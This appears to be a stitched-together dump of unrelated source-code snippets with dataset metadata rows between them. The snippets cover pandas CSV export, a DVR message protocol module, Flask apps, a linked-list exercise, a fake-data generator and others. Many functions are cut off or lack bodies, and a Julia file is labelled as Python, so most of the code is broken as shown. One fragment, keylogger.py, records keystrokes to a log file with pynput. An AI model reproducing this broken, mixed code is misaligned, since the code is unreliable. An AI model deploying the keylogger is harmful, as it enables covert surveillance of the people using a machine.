tnacb["Year"].append(tx_tn_data["Year"][i])
tnacb["Data"].append(tx_tn_data["Data"][i])
elif tx_tn_data["MSN"][i] == "TNCCB":
tnccb["Year"].append(tx_tn_data["Year"][i])
tnccb["Data"].append(tx_tn_data["Data"][i])
elif tx_tn_data["MSN"][i] == "TNICB":
tnicb["Year"].append(tx_tn_data["Year"][i])
tnicb["Data"].append(tx_tn_data["Data"][i])
elif tx_tn_data["MSN"][i] == "TNRCB":
tnrcb["Year"].append(tx_tn_data["Year"][i])
tnrcb["Data"].append(tx_tn_data["Data"][i])
else:
pass
tnacb_data = pd.DataFrame(tnacb)
tnacb_data.to_csv("data/csv/consumption/sector/tx/tn/tnacb.csv",
index=False, index_label=False, sep=',')
tnccb_data = pd.DataFrame(tnccb)
tnccb_data.to_csv("data/csv/consumption/sector/tx/tn/tnccb.csv",
index=False, index_label=False, sep=',')
tnicb_data = pd.DataFrame(tnicb)
tnicb_data.to_csv("data/csv/consumption/sector/tx/tn/tnicb.csv",
index=False, index_label=False, sep=',')
tnrcb_data = pd.DataFrame(tnrcb)
tnrcb_data.to_csv("data/csv/consumption/sector/tx/tn/tnrcb.csv",
index=False, index_label=False, sep=',')
# print(tnacb_data)
# print(tnccb_data)
# print(tnicb_data)
# print(tnrcb_data)
| 30.554348 | 106 | 0.645322 |
3c5e4a066c2e5a426373071cec77c0e0b8244f50 | 10,040 | py | Python | dvrip/message.py | alexshpilkin/xmeye | e76df1d091d85aa6cffb5c332ba6ae419ac9ac89 | [
"CC0-1.0"
] | 34 | 2019-05-04T06:06:17.000Z | 2021-12-06T03:28:40.000Z | dvrip/message.py | alexshpilkin/xmeye | e76df1d091d85aa6cffb5c332ba6ae419ac9ac89 | [
"CC0-1.0"
] | 9 | 2019-06-17T09:37:50.000Z | 2020-10-24T22:36:29.000Z | dvrip/message.py | alexshpilkin/xmeye | e76df1d091d85aa6cffb5c332ba6ae419ac9ac89 | [
"CC0-1.0"
] | 21 | 2019-06-17T09:34:27.000Z | 2022-03-22T18:14:22.000Z | from abc import abstractmethod
from datetime import datetime, timedelta
from enum import Enum, unique
from io import RawIOBase
from json import dumps, load
from string import hexdigits
from typing import ClassVar, Generator, Generic, Iterable, List, Optional, \
Sequence, Type, TypeVar, Union, cast
from .errors import DVRIPDecodeError
from .packet import Packet
from .typing import Value, for_json, json_to
_C = TypeVar('_C', bound='Choice')
_M = TypeVar('_M', bound='Message')
_R = TypeVar('_R', bound='Status')
_S = TypeVar('_S', bound='Session')
_T = TypeVar('_T')
hextype = (_json_to_hex, _hex_for_json)
_DTFORMAT = '%Y-%m-%d %H:%M:%S'
_NOSTRING = '0000-00-00 00:00:00'
_EPSTRING = '2000-00-00 00:00:00'
EPOCH = datetime(2000, 1, 1, 0, 0, 0)
RESOLUTION = timedelta(seconds=1)
datetimetype = (_json_to_datetime, _datetime_for_json)
Filter = Generator[Union['NotImplemented', None, _T], Optional[Packet], None]
| 30.892308 | 112 | 0.684363 |
3c699b1ae35663ad09b05a480af4601cff664c7b | 1,276 | py | Python | opennem/core/stations/station_code_from_duids.py | willhac/opennem | c8fbcd60e06898e1eeb2dad89548c4ece1b9a319 | [
"MIT"
] | null | null | null | opennem/core/stations/station_code_from_duids.py | willhac/opennem | c8fbcd60e06898e1eeb2dad89548c4ece1b9a319 | [
"MIT"
] | 1 | 2020-09-06T04:17:59.000Z | 2020-09-06T04:17:59.000Z | opennem/core/stations/station_code_from_duids.py | tourdownunder/opennem | deec3e2079db9d9d84171010fd0c239170d1e7ce | [
"MIT"
] | null | null | null | from functools import reduce
from typing import List, Optional
from opennem.core.normalizers import is_single_number
def station_code_from_duids(duids: List[str]) -> Optional[str]:
"""
Derives a station code from a list of duids
ex.
BARRON1,BARRON2 => BARRON
OSBAG,OSBAG => OSBAG
"""
if type(duids) is not list:
return None
if not duids:
return None
if len(duids) == 0:
return None
duids_uniq = list(set(duids))
common = findcommonstart(duids_uniq)
if not common:
return None
# strip last character if we have one
if is_single_number(common[-1]):
common = common[:-1]
if common.endswith("_"):
common = common[:-1]
if len(common) > 2:
return common
return None
| 19.044776 | 63 | 0.580721 |
3c6baa9940a450d52040d4e352d35fb76791c5db | 1,733 | py | Python | models/Schedule.py | CargaPesada/webservice | 2725dc9ac97e8e09a94b0a752b0885bc77d8a3d4 | [
"MIT"
] | null | null | null | models/Schedule.py | CargaPesada/webservice | 2725dc9ac97e8e09a94b0a752b0885bc77d8a3d4 | [
"MIT"
] | 1 | 2019-11-06T19:21:49.000Z | 2019-11-06T19:21:49.000Z | models/Schedule.py | CargaPesada/webservice | 2725dc9ac97e8e09a94b0a752b0885bc77d8a3d4 | [
"MIT"
] | null | null | null | from database.interface import FirebaseInterface
| 30.403509 | 83 | 0.590306 |
3c6c95883a2948952fd4f838b95cb8573feed183 | 381 | py | Python | Python/DS/tuple.py | salikansari6/interview-prep | 17e98fbb15f87c9f2ecd293896e613f5fe01d3a3 | [
"MIT"
] | 1 | 2021-08-23T18:18:41.000Z | 2021-08-23T18:18:41.000Z | Python/DS/tuple.py | salikansari6/interview-prep | 17e98fbb15f87c9f2ecd293896e613f5fe01d3a3 | [
"MIT"
] | null | null | null | Python/DS/tuple.py | salikansari6/interview-prep | 17e98fbb15f87c9f2ecd293896e613f5fe01d3a3 | [
"MIT"
] | 1 | 2021-08-24T15:40:15.000Z | 2021-08-24T15:40:15.000Z | # Tuples are immutable
# Demonstrates tuple literals, nesting, and packing/unpacking.
print("============ tuples ============")
print()

packed = (12345, 54321, 'hello!')
print(packed)

# Tuples nest: `packed, (...)` packs two tuples into a new outer tuple.
nested = packed, (1, 2, 3, 4, 5)
print(nested)

# Tuple packing bundles 12345, 54321 and 'hello!' into one object;
# sequence unpacking is the reverse operation.
x, y, z = packed
print(x, y, z)
| 22.411765 | 74 | 0.627297 |
3c6cfcc4cc77979d142a645197f0b512545357ec | 4,304 | py | Python | modules/labelfusion/imagecapture.py | hz-ants/LabelFusion-docker2- | 8dc116064a1bdcfa2c2dd814580b5f43d46c6f40 | [
"BSD-3-Clause"
] | 313 | 2017-07-16T02:00:16.000Z | 2022-03-31T11:00:10.000Z | modules/labelfusion/imagecapture.py | hz-ants/LabelFusion-docker2- | 8dc116064a1bdcfa2c2dd814580b5f43d46c6f40 | [
"BSD-3-Clause"
] | 94 | 2017-07-16T19:59:06.000Z | 2022-03-30T08:14:22.000Z | modules/labelfusion/imagecapture.py | hz-ants/LabelFusion-docker2- | 8dc116064a1bdcfa2c2dd814580b5f43d46c6f40 | [
"BSD-3-Clause"
] | 87 | 2017-07-14T16:01:54.000Z | 2022-03-23T17:33:47.000Z | """
This class consumes and lcmlog, extracts the images and saves them
to png
"""
import os
# director imports
import director.vtkAll as vtk
from director import filterUtils
from director import lcmUtils
from director import cameraview
import bot_core as lcmbotcore
from . import utils
| 32.360902 | 137 | 0.657528 |
3c6d83deebd752e29ffb47bbb2f60866fbe395f9 | 1,947 | py | Python | pattern6-in-place-reversal-of-a-linkedlist/4. Reverse alternating K-element Sub-list (medium).py | dopiwoo/Grokking-the-Coding-Interview | 78b2bacf9d761b460ac78882bac42df7465feec9 | [
"MIT"
] | null | null | null | pattern6-in-place-reversal-of-a-linkedlist/4. Reverse alternating K-element Sub-list (medium).py | dopiwoo/Grokking-the-Coding-Interview | 78b2bacf9d761b460ac78882bac42df7465feec9 | [
"MIT"
] | null | null | null | pattern6-in-place-reversal-of-a-linkedlist/4. Reverse alternating K-element Sub-list (medium).py | dopiwoo/Grokking-the-Coding-Interview | 78b2bacf9d761b460ac78882bac42df7465feec9 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Feb 3 16:59:33 2021
@author: dopiwoo
Given the head of a LinkedList and a number 'k', reverse every alternating 'k' sized sub-list starting from the head.
If, in the end, you are left with a sub-list with less than 'k' elements, reverse it too.
"""
def reverse_alternative_k_elements(head: Node, k: int) -> Node or None:
"""
Time Complexity: O(N)
Space Complexity: O(1)
Parameters
----------
head : Node
Input head of a LinkedList.
k : int
Input number 'k'.
Returns
-------
Node or None
The LinkedList reversed every alternating 'k' sized sub-list starting from the head.
"""
if not head:
return None
cur, prev = head, None
while cur:
i = 0
tail, con = cur, prev
while cur and i < k:
third = cur.next
cur.next = prev
prev = cur
cur = third
i += 1
if con:
con.next = prev
else:
head = prev
tail.next = cur
i = 0
while cur and i < k:
prev = cur
cur = cur.next
i += 1
return head
if __name__ == '__main__':
a = Node(1)
a.next = Node(2)
a.next.next = Node(3)
a.next.next.next = Node(4)
a.next.next.next.next = Node(5)
a.next.next.next.next.next = Node(6)
a.next.next.next.next.next.next = Node(7)
a.next.next.next.next.next.next.next = Node(8)
print(a)
print(reverse_alternative_k_elements(a, 2))
| 24.037037 | 117 | 0.546482 |
3c6ebf3a0e9fc7f67c121517ca72e84e2133c821 | 833 | py | Python | scripts/datasets/dataset.py | daniele21/Financial_Sentiment_Analysis | 3734733f2d1d291c81a6239de121edcce861b463 | [
"MIT"
] | null | null | null | scripts/datasets/dataset.py | daniele21/Financial_Sentiment_Analysis | 3734733f2d1d291c81a6239de121edcce861b463 | [
"MIT"
] | null | null | null | scripts/datasets/dataset.py | daniele21/Financial_Sentiment_Analysis | 3734733f2d1d291c81a6239de121edcce861b463 | [
"MIT"
] | 1 | 2021-08-18T01:40:56.000Z | 2021-08-18T01:40:56.000Z | from typing import Text, Dict
import torch
from torch.utils.data import Dataset
| 16.333333 | 53 | 0.619448 |
3c6f84e2e28d5d42137620dfcf9d443aafcc4dc6 | 1,447 | py | Python | citadel/ext.py | CMGS/citadel | 8363a598ed4422d6671f06bad7def3ebb848f441 | [
"MIT"
] | null | null | null | citadel/ext.py | CMGS/citadel | 8363a598ed4422d6671f06bad7def3ebb848f441 | [
"MIT"
] | null | null | null | citadel/ext.py | CMGS/citadel | 8363a598ed4422d6671f06bad7def3ebb848f441 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from authlib.client.apps import github
from authlib.flask.client import OAuth
from etcd import Client
from flask import session
from flask_caching import Cache
from flask_mako import MakoTemplates
from flask_session import Session
from flask_sockets import Sockets
from flask_sqlalchemy import SQLAlchemy
from redis import Redis
from citadel.config import ZONE_CONFIG, REDIS_URL
from citadel.libs.utils import memoize
# Flask extension singletons, created unbound here and presumably attached
# to the app later via the usual init_app() pattern -- confirm in app setup.
db = SQLAlchemy()
mako = MakoTemplates()
sockets = Sockets()
# Shared Redis connection for the whole process.
rds = Redis.from_url(REDIS_URL)
# NOTE(review): fetch_token / update_token are not defined in this excerpt;
# they are presumably the session-token helper functions this module defines
# above -- confirm against the full source.
oauth = OAuth(fetch_token=fetch_token, update_token=update_token)
github.register_to(oauth)
cache = Cache(config={'CACHE_TYPE': 'redis'})
sess = Session()
| 27.301887 | 96 | 0.769178 |
3c6f8f5f4f2e782fc4abccdc891d3ed15ff06ea9 | 6,625 | py | Python | generate_fake_data.py | upb-uc4/deployment | 0c82de72bb7e758c5afaf8866b238ff17cf908ea | [
"Apache-2.0"
] | null | null | null | generate_fake_data.py | upb-uc4/deployment | 0c82de72bb7e758c5afaf8866b238ff17cf908ea | [
"Apache-2.0"
] | 2 | 2021-02-13T13:19:45.000Z | 2021-02-13T14:46:02.000Z | generate_fake_data.py | upb-uc4/deployment | 0c82de72bb7e758c5afaf8866b238ff17cf908ea | [
"Apache-2.0"
] | null | null | null | import json
import random
import os
import re
from faker import Faker
################################################################################
# Some settings:
################################################################################
ADMIN_COUNT = 2
STUDENT_COUNT = 40
LECTURER_COUNT = 10
EXAM_REG_COUNT = 6
COURSE_COUNT = 10
ROLES = ["Student", "Admin", "Lecturer"]
FIELDS_OF_STUDY = [
"Computer Science",
"Chemistry",
"Biology",
"Physics",
"Religion",
"Sociology",
]
MODULE_PREFICES = [
"Topics of",
"Introduction to",
"Applied",
"Theorotical",
"Experimental",
]
COURSE_TYPES = ["Lecture", "Project Group", "Seminar"]
COUNTRIES = ["Germany", "United States", "Italy", "France", "United Kingdom", "Belgium", "Netherlands", "Spain", "Austria", "Switzerland", "Poland"]
fake = Faker("en-US")
fake.random.seed(654321)
################################################################################
# Output root for the generated JSON fixtures.
# NOTE(review): basepath is not referenced in this excerpt; presumably
# write_to_file() (defined elsewhere in this script) uses it -- confirm.
basepath = os.path.join("defaults", "generated")
# Collects generated lecturer ids, shared across generate_lecturer() calls.
lecturer_ids = []
modules_by_field_of_study = {
    field: [] for field in FIELDS_OF_STUDY
}  # Dict with modules mapped to their field of study (to let generated data appear less random)
# NOTE(review): the helpers used below (write_to_file, json_dump_dict,
# generate_student, generate_lecturer, generate_exam_reg, generate_course)
# are not part of this excerpt; confirm against the full file.
# Emit one JSON file per entity, named 00.json, 01.json, ...
# Admins reuse generate_student() -- presumably they share the same personal
# data fields; verify this is intentional.
for i in range(ADMIN_COUNT):
    write_to_file(
        json_dump_dict(generate_student()), "admins", str(i).zfill(2) + ".json"
    )
for i in range(STUDENT_COUNT):
    write_to_file(
        json_dump_dict(generate_student()), "students", str(i).zfill(2) + ".json"
    )
for i in range(LECTURER_COUNT):
    write_to_file(
        json_dump_dict(generate_lecturer(lecturer_ids)),
        "lecturers",
        str(i).zfill(2) + ".json",
    )
for i in range(EXAM_REG_COUNT):
    write_to_file(
        json_dump_dict(generate_exam_reg(modules_by_field_of_study)),
        "examRegs",
        str(i).zfill(2) + ".json",
    )
for i in range(COURSE_COUNT):
    write_to_file(
        json_dump_dict(generate_course()), "courses", str(i).zfill(2) + ".json"
    )
print("Done! ")
print(
    "Generated: {} Admins, {} Students, {} Lecturers, {} Exam Regs and {} Courses".format(
        ADMIN_COUNT, STUDENT_COUNT, LECTURER_COUNT, EXAM_REG_COUNT, COURSE_COUNT
    )
)
| 30.113636 | 148 | 0.579019 |
3c70133f7cd579129c6a6ff4af02a403f5a5c1b6 | 2,972 | py | Python | CodeMixed-Text-Generator/cm_text_generator/lattice_operations.py | mohdsanadzakirizvi/CodeMixed-Text-Generator | 47740eeff3ecb46f5294711f4fe5d3a03a6e0b54 | [
"MIT"
] | 16 | 2021-06-03T07:16:15.000Z | 2022-03-24T13:07:31.000Z | CodeMixed-Text-Generator/cm_text_generator/lattice_operations.py | mohdsanadzakirizvi/CodeMixed-Text-Generator | 47740eeff3ecb46f5294711f4fe5d3a03a6e0b54 | [
"MIT"
] | 6 | 2021-06-30T12:06:33.000Z | 2022-02-10T04:49:10.000Z | CodeMixed-Text-Generator/cm_text_generator/lattice_operations.py | mohdsanadzakirizvi/CodeMixed-Text-Generator | 47740eeff3ecb46f5294711f4fe5d3a03a6e0b54 | [
"MIT"
] | 4 | 2021-07-04T14:21:56.000Z | 2021-08-23T19:55:06.000Z | ###LATTICE OPERATIONS
from .data_structure_definitions import *
| 33.393258 | 116 | 0.605316 |
3c71ada98a6d21e9df0e6b1ca11604cd29f59b82 | 2,949 | py | Python | vnpy/app/influx_recorder/ui/widget.py | hadrianl/vnpy | f197df974eb6d3a0fddb81b591dd98d3d102a4a2 | [
"MIT"
] | 5 | 2019-05-24T05:19:55.000Z | 2020-07-29T13:21:49.000Z | vnpy/app/influx_recorder/ui/widget.py | hadrianl/vnpy | f197df974eb6d3a0fddb81b591dd98d3d102a4a2 | [
"MIT"
] | null | null | null | vnpy/app/influx_recorder/ui/widget.py | hadrianl/vnpy | f197df974eb6d3a0fddb81b591dd98d3d102a4a2 | [
"MIT"
] | 2 | 2019-07-01T02:14:04.000Z | 2020-07-29T13:21:53.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2020/10/28 0028 11:34
# @Author : Hadrianl
# @File : widget
from vnpy.event import EventEngine, Event
from vnpy.trader.engine import MainEngine
from vnpy.trader.ui import QtWidgets, QtCore
from ..engine import APP_NAME
| 31.709677 | 84 | 0.665649 |
3c749728947c088616bb2bf3b46fdb1485731043 | 5,021 | py | Python | application/views/client/users/views.py | Zinston/giftr | 997d4b8127b34cc0009621d66f69bc00ed3b985a | [
"Apache-2.0"
] | null | null | null | application/views/client/users/views.py | Zinston/giftr | 997d4b8127b34cc0009621d66f69bc00ed3b985a | [
"Apache-2.0"
] | null | null | null | application/views/client/users/views.py | Zinston/giftr | 997d4b8127b34cc0009621d66f69bc00ed3b985a | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
"""Define routes for CRUD operations on users."""
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from application.models import (Base,
Gift,
Claim,
User)
from flask import (request,
redirect,
url_for,
render_template,
flash,
session,
Blueprint)
# For making decorators
from functools import wraps
# Bind database
engine = create_engine('sqlite:///giftr.db')
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
c = DBSession()
users_blueprint = Blueprint('users', __name__, template_folder='templates')
# DECORATORS
def login_required(f):
    """Redirect to login page if the user is not logged in (decorator)."""
    # NOTE(review): the wrapped inner function (typically built with
    # functools.wraps(f)) is missing from this excerpt, so the name
    # `decorated_function` is unresolved here -- confirm against full source.
    return decorated_function
def include_user(f):
    """Take a u_id kwarg and return a user object (decorator)."""
    # NOTE(review): inner wrapper missing from this excerpt (same as login_required).
    return decorated_function
def user_required(f):
    """Take a user id (u_id) and redirect to home if logged in user doesn't match that id (decorator).""" # noqa
    # NOTE(review): inner wrapper missing from this excerpt (same as login_required).
    return decorated_function
# ROUTES
| 28.050279 | 113 | 0.632344 |
3c7515d17c45501d0f2599188199dfb75f86e5a6 | 2,077 | py | Python | server.py | mleger45/embevent | c717adb6d172b83ae12cb82021df856831a4e4fb | [
"MIT"
] | null | null | null | server.py | mleger45/embevent | c717adb6d172b83ae12cb82021df856831a4e4fb | [
"MIT"
] | null | null | null | server.py | mleger45/embevent | c717adb6d172b83ae12cb82021df856831a4e4fb | [
"MIT"
] | null | null | null | from flask import Flask
import requests
from bs4 import BeautifulSoup
import os
import sqlite3
import logging
logging.basicConfig(filename='example.log', level=logging.DEBUG)
URL = os.environ['SOURCE_URL']
AGENT = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'
app = Flask(__name__)
| 32.968254 | 131 | 0.632162 |
3c761056de60be7b447d3aeb8075e25a0bb554cd | 1,278 | py | Python | nodaysoff/__init__.py | attila5287/no_days_off | 2482b90b841032976002a3888aa546bb7070a46c | [
"MIT"
] | 1 | 2019-12-28T05:25:01.000Z | 2019-12-28T05:25:01.000Z | nodaysoff/__init__.py | attila5287/no_days_off | 2482b90b841032976002a3888aa546bb7070a46c | [
"MIT"
] | 6 | 2019-12-28T01:12:25.000Z | 2022-03-12T00:10:08.000Z | nodaysoff/__init__.py | attila5287/no_days_off | 2482b90b841032976002a3888aa546bb7070a46c | [
"MIT"
] | null | null | null | from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_bcrypt import Bcrypt
from flask_login import LoginManager
from flask_mail import Mail
from nodaysoff.config import Config
# from flask_session import Session
db = SQLAlchemy()
bcrypt = Bcrypt()
login_manager = LoginManager()
login_manager.login_view = 'users.login'
login_manager.login_message_category = 'primary'
mail = Mail()
| 30.428571 | 59 | 0.739437 |
3c768b97cd3aef1e83be11569f9ef43e98211953 | 695 | py | Python | examples/lobpcg_test.py | Forgotten/modelscf | 2cf0fe5210fadcee7da70d6bf035336c38d150db | [
"BSD-3-Clause-LBNL"
] | 1 | 2021-09-22T21:48:02.000Z | 2021-09-22T21:48:02.000Z | examples/lobpcg_test.py | Forgotten/modelscf | 2cf0fe5210fadcee7da70d6bf035336c38d150db | [
"BSD-3-Clause-LBNL"
] | 2 | 2018-01-19T18:46:35.000Z | 2019-04-09T22:59:46.000Z | examples/lobpcg_test.py | Forgotten/modelscf | 2cf0fe5210fadcee7da70d6bf035336c38d150db | [
"BSD-3-Clause-LBNL"
] | 6 | 2018-01-19T18:34:12.000Z | 2018-04-06T04:13:03.000Z | # scrip to test the lobpcg_sep eigenvalue solver
include("../src/lobpcg_sep.jl")
using LinearAlgebra
Ns = 100
k = 5 # number of eigenvectors
A = sqrt(Ns)*Diagonal(ones(Ns)) + rand(Ns, Ns)
A = 0.5*(A + A')
(e, X) = eigen(A)
# orthonormal starting guess of the eigenvectors
X0 = qr(rand(Ns, k + 6)).Q[:, 1:k+6]
#computing the lowest K eigenvalues
(eL, XL, it) = lobpcg_sep(A,X0, x-> x, k )
# printing the error
println("error on the computation the eigenvalues " * string(norm(eL - e[1:k])))
# now we use a preconditioner (the exact inverse)
Ainv = inv(A)
(eL1, XL1, it1) = lobpcg_sep(A,X0, x-> Ainv*x, k)
println("error on the computation the eigenvalues " * string(norm(eL1 - e[1:k])))
| 24.821429 | 81 | 0.667626 |
3c7727ecdb99959039e2a39114163de2e8432514 | 1,549 | py | Python | TraitsUI/examples/ButtonEditor_demo.py | marshallmcdonnell/interactive_plotting | 35e9a781fa1a7328679794d27e24e194e35c012b | [
"MIT"
] | null | null | null | TraitsUI/examples/ButtonEditor_demo.py | marshallmcdonnell/interactive_plotting | 35e9a781fa1a7328679794d27e24e194e35c012b | [
"MIT"
] | null | null | null | TraitsUI/examples/ButtonEditor_demo.py | marshallmcdonnell/interactive_plotting | 35e9a781fa1a7328679794d27e24e194e35c012b | [
"MIT"
] | null | null | null | """
Implementation of a ButtonEditor demo plugin for Traits UI demo program.
This demo shows each of the two styles of the ButtonEditor.
(As of this writing, they are identical.)
"""
from traits.api import HasTraits, Button
from traitsui.api import Item, View, Group
from traitsui.message import message
#-------------------------------------------------------------------------
# Demo Class
#-------------------------------------------------------------------------
# Create the demo:
popup = ButtonEditorDemo()
# Run the demo (if invoked from the command line):
if __name__ == '__main__':
popup.configure_traits()
| 30.98 | 78 | 0.551323 |
3c77652672bdfce35cef51c965f7b9c88501f504 | 1,181 | py | Python | setup.py | FelixSchwarz/trac-dev-platform | d9ede1eb2c883466968a048eaede95ff868a4fda | [
"MIT"
] | null | null | null | setup.py | FelixSchwarz/trac-dev-platform | d9ede1eb2c883466968a048eaede95ff868a4fda | [
"MIT"
] | null | null | null | setup.py | FelixSchwarz/trac-dev-platform | d9ede1eb2c883466968a048eaede95ff868a4fda | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
import setuptools
version='0.1'
setuptools.setup(
name='TracDevPlatformPlugin',
version=version,
description='Provide helpers to ease development on top of Trac',
author='Felix Schwarz',
author_email='felix.schwarz@oss.schwarz.eu',
url='http://www.schwarz.eu/opensource/projects/trac_dev_platform',
download_url='http://www.schwarz.eu/opensource/projects/trac_dev_platform/download/%s' % version,
license='MIT',
install_requires=['Trac >= 0.11'],
extras_require={'BeautifulSoup': 'BeautifulSoup'},
tests_require=['nose'],
test_suite = 'nose.collector',
zip_safe=False,
packages=setuptools.find_packages(exclude=['tests']),
include_package_data=True,
classifiers = [
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Software Development :: Libraries :: Python Modules',
'Framework :: Trac',
],
)
| 31.078947 | 101 | 0.653683 |
3c78adc10fdbecc0bce8f85ff740740007a63985 | 276 | py | Python | keylogger.py | ReLRail/project-touhou | fbfbdb81c40aa9b87143797c32af43d4e9d7c1e9 | [
"MIT"
] | null | null | null | keylogger.py | ReLRail/project-touhou | fbfbdb81c40aa9b87143797c32af43d4e9d7c1e9 | [
"MIT"
] | null | null | null | keylogger.py | ReLRail/project-touhou | fbfbdb81c40aa9b87143797c32af43d4e9d7c1e9 | [
"MIT"
] | null | null | null | from pynput.keyboard import Key, Listener
import logging
logging.basicConfig(filename=("keylog.txt"), level=logging.DEBUG, format=" %(asctime)s - %(message)s")
with Listener(on_press=on_press) as listener:
listener.join() | 23 | 102 | 0.735507 |
3c797bad94039032f3ec8a0956509b976eb165dd | 1,372 | py | Python | app/core/migrations/0007_order.py | ifiokeyo/RecipeAPI | 8ec8f8e4ca868a9c9cd97d534dc6f42a4fa14974 | [
"MIT"
] | null | null | null | app/core/migrations/0007_order.py | ifiokeyo/RecipeAPI | 8ec8f8e4ca868a9c9cd97d534dc6f42a4fa14974 | [
"MIT"
] | null | null | null | app/core/migrations/0007_order.py | ifiokeyo/RecipeAPI | 8ec8f8e4ca868a9c9cd97d534dc6f42a4fa14974 | [
"MIT"
] | null | null | null | # Generated by Django 2.2.6 on 2019-11-02 09:32
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import uuid
| 45.733333 | 159 | 0.618076 |
3c7b515ae39c770bf0370e05e2c3d7ec44f6e7fd | 2,687 | py | Python | src/components/Bot.py | Vini-Dev-Py/Bot-ML | f1dfda7a43940a7ada707ccaa9dde486b3c5ddd3 | [
"MIT"
] | null | null | null | src/components/Bot.py | Vini-Dev-Py/Bot-ML | f1dfda7a43940a7ada707ccaa9dde486b3c5ddd3 | [
"MIT"
] | null | null | null | src/components/Bot.py | Vini-Dev-Py/Bot-ML | f1dfda7a43940a7ada707ccaa9dde486b3c5ddd3 | [
"MIT"
] | null | null | null | from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import time
import random
import datetime
from tkinter import *
from tkinter import messagebox
from tkinter import ttk
import functools
# import pathlib
from conflista import Bot
from salvacode import Salvar
from escreve import escreve
from geraqrcode import Gerar
date = datetime.date.today()
jan = Tk()
jan.title("Bot Mercado Envios")
jan.geometry("800x300")
jan.configure(background="#2b2b2b")
jan.resizable(width=False, height=False)
jan.iconbitmap(default="C:\programas\Programao\GitHub\Bot-ML\Bot-ML\images\LogoIcon.ico")
logo = PhotoImage(file="C:\programas\Programao\GitHub\Bot-ML\Bot-ML\images\logo.png")
messagebox.showinfo("Hello World !", "Seja Bem-Vindo ")
LeftFrame = Frame(jan, width=220, height=500, bg="#FF8C00", relief="raise")
LeftFrame.pack(side=LEFT)
RightFrame = Frame(jan, width=575, height=500, bg="#4f4f4f", relief="raise")
RightFrame.pack(side=RIGHT)
Caixas = Label(RightFrame, text="Total De Caixas:", font=("Century Gothic", 20), bg="#4f4f4f", fg="Black")
Caixas.place(x=5, y=10)
CaixasEntry = ttk.Entry(RightFrame, width=53)
CaixasEntry.place(x=230, y=25)
Lote = Label(RightFrame, text="N Do Lote:", font=("Century Gothic", 20), bg="#4f4f4f", fg="Black")
Lote.place(x=5, y=75)
LoteEntry = ttk.Entry(RightFrame, width=53)
LoteEntry.place(x=230, y=90)
Valores = Label(RightFrame, text="Codigos Lidos: ", font=("Century Gothic", 20), bg="#4f4f4f", fg="Black")
Valores.place(x=5, y=140)
ValoresEntry = Text(RightFrame, width=40, height=5)
# ValoresEntry.config(state=state)
ValoresEntry.place(x=230, y=155)
# file = open(f'C:\programas\Programao\GitHub\{date} QR-BarCode-Unity.txt', 'w+')
# file = open(f'{date} QR-BarCode-Unity', 'w+')
ConfButton = ttk.Button(RightFrame, text="Adicionar Lista", width= 30, command=PegaLista)
ConfButton.place(x=5, y=190)
jan.mainloop() | 26.60396 | 106 | 0.671381 |
3c7b6e7f1356932087387fb61f2acb5391ed0b70 | 943 | py | Python | src/data/make_atac.py | mguo123/pan_omics | e1cacd543635b398fb08c0b31d08fa6b7c389658 | [
"MIT"
] | null | null | null | src/data/make_atac.py | mguo123/pan_omics | e1cacd543635b398fb08c0b31d08fa6b7c389658 | [
"MIT"
] | null | null | null | src/data/make_atac.py | mguo123/pan_omics | e1cacd543635b398fb08c0b31d08fa6b7c389658 | [
"MIT"
] | null | null | null | """
process_atac.py
Margaret Guo
04/15/2020
footprinting (.bed) --> csv)
notebooks
- make_hichip_df-withsnps-cancer-only
"""
#### FIX FOR HOCO
| 29.46875 | 104 | 0.69035 |
3c7b9bebae1fcd81af0109ae86287f833fb440e9 | 834 | py | Python | waimai/libs/login.py | xucheng11/test | 2987d34823825798bffac3cfb30cadab42dae998 | [
"MulanPSL-1.0"
] | null | null | null | waimai/libs/login.py | xucheng11/test | 2987d34823825798bffac3cfb30cadab42dae998 | [
"MulanPSL-1.0"
] | null | null | null | waimai/libs/login.py | xucheng11/test | 2987d34823825798bffac3cfb30cadab42dae998 | [
"MulanPSL-1.0"
] | null | null | null | """
-------------------------------------------------
# @Project :
# @File :login
# @Date :2021/8/1 18:16
# @Author :
# @Email :1224069978
# @Software :PyCharm
-------------------------------------------------
"""
import hashlib,copy,requests
from conf.host import *
if __name__ == '__main__':
print(Login().login(user)) | 25.272727 | 55 | 0.52518 |
3c7be908e5d846fc839b0269f1d2587bd74e3afb | 409 | py | Python | identities.py | Nandan-18/Algebraic-Identites | 7ba979fbddbf1d487e728ed41aafd1eed5e3e100 | [
"MIT"
] | null | null | null | identities.py | Nandan-18/Algebraic-Identites | 7ba979fbddbf1d487e728ed41aafd1eed5e3e100 | [
"MIT"
] | null | null | null | identities.py | Nandan-18/Algebraic-Identites | 7ba979fbddbf1d487e728ed41aafd1eed5e3e100 | [
"MIT"
] | null | null | null |
# Supporting Module
# identities.py
| 15.148148 | 60 | 0.405868 |
3c7e63e11d96ab3935b8bb543acdf655bcf3abc1 | 14,296 | py | Python | betsy.py | animeshsagar/Betsy | 5cc4ca126fe56803696967b59a9ace61ae7e3f7b | [
"MIT"
] | null | null | null | betsy.py | animeshsagar/Betsy | 5cc4ca126fe56803696967b59a9ace61ae7e3f7b | [
"MIT"
] | null | null | null | betsy.py | animeshsagar/Betsy | 5cc4ca126fe56803696967b59a9ace61ae7e3f7b | [
"MIT"
] | null | null | null | #!/usr/bin/env python2
# Design Decisions
# Heuristic : Heuristic tries to maximize the pieces of that particular player on top n rows
# Min-Max : Min-Max algorithm has been used
# IDS : Iterative deepening search has been used to move down the tree(depth:100)
# No Time Constrain : No time constrain has been taken.Instead the program prints move iteratively as it goes down the depth
